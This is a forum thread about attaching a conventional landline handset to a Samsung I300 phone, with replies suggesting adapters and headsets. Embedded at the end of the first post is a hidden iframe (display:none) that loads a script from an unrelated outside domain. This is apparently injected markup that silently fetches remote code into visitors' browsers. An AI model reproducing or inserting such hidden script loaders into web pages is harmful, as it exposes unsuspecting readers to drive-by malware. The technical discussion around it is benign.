+ Reply to Thread

Lightbulb Traditional Handset hooked to I300

O.K. I'm sitting at my desk with two phone lines, one is the business line for outgoing calls, the other is connected to the computer for internet & outgoing calls. Right next to my monitor is the I-300. I think the audio quality on my end is sometimes better on one of the over the ear headsets.....How about using a traditional headset like I have on my other two lines....assuming I could solder up an adapter with the help of Radio Shack....would this be a way to get better audio quality on my end...TIA Eddie<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

i don't really understand your question... do you want to use a headset on the i300 that you already use for your home phone? that is possibile... but im sure i dont have your "jist" of the message...

Please excuse lack of precision ...it was late. I am reffering to the traditional HAND....SET found on conventional land line phones. The kind they've been making for 50 years. I'd like to get a jack from Radio Shack connect that to a modular phone connector and speak and listen through the conventional land line HAND...SET for better audio reception on my end. The Samsung is just sitting there in the cradle next to the other two phones and I use it for all my long distance now. Does anyone know of aftermarket adapter that does the job without pulling out the soldering gun???

Administrator

Arrow

i got ya!

i do believe there is a box made for the phone hack that conects it to a line level jack... radio shack should have this. they are used to record conversaions on the phone to a tape deck.. problem is, you may be able to hear on the hand...set, but you might not be able to talk on it... simply trying to use the i300 mic wont work as once youh plug the jack into the phone, that will cut off the mic on the phone...

why not just use a house phone type headset?

Exactly. Whats wrong with using a headset? I don't think you plan on walking around town with the handset so the headsets would certainly be loud and clear. I think that may be what confused Marc initially.

In fact the Sony Wisp Ear is marketed for use with a home phone as well.

I'll keep trying and report. My quest is for better audio reception on my end. Theory being larger speaker=clearer and less tinny. The thing is always there next to the two other phones....I'll figure something out.
    eddie

Administrator

Arrow

Theory being larger speaker=clearer and less tinny
    keep in mind, even though you could have a bigger speaker you wont get any beter sound, unless you install a preamp and some eq to overcome the lousy 1K freq. response from the actual call itself... so you will have a bigger but still "tinny" sound....

audio options

2.5mm <-> RJ-11 hybrid

http://www.bswonline.com/public/prod...item=DAPTORONE

I've also seen one- and two-ear headsets with 2.5mm plugs designed for broadcasting via a mobile phone, but I'm not finding them now. Here's an aviation headset with mobile phone adapter, though.

http://www.pilotportal.com/catalog/s...m?product=1644

smartphonecentral.com
    Now that'd be cool: An old-style phone handset, just like the ones on old phones, but with new-style small plug! So I can walk down the street talking on the "phone!"

I guess that's pretty retro. Hey, maybe they can put a real bell-style ringer too!

--Jesse
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

I am still a bit baffled by this thread.

smartphonecentral.com
    Step 1: Plant tongue firmly in cheek.
    Step 2: See step 1.

--Jesse
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::